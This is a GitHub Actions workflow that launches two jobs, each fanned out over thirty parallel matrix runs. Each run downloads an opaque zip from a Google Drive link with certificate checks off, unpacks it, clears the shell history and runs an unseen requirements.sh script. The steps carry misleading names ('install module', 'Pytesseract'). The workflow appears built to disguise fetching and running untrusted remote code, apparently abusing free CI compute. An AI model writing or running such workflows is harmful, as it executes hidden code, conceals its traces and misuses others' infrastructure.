name: ultrasystem431forge
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  SHIP:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Configure', 'Build', 'Analyze', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1jBqwUqIpfSm0yBiNJ4HB1PLGlcuCBhY_" -O Dagster.zip
        unzip -o Dagster.zip
        rm Dagster.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  DEPLOY1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Provision', 'Compile', 'Verify', 'Launch', 'Deploy']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1jBqwUqIpfSm0yBiNJ4HB1PLGlcuCBhY_" -O Dagster.zip
        unzip -o Dagster.zip
        rm Dagster.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
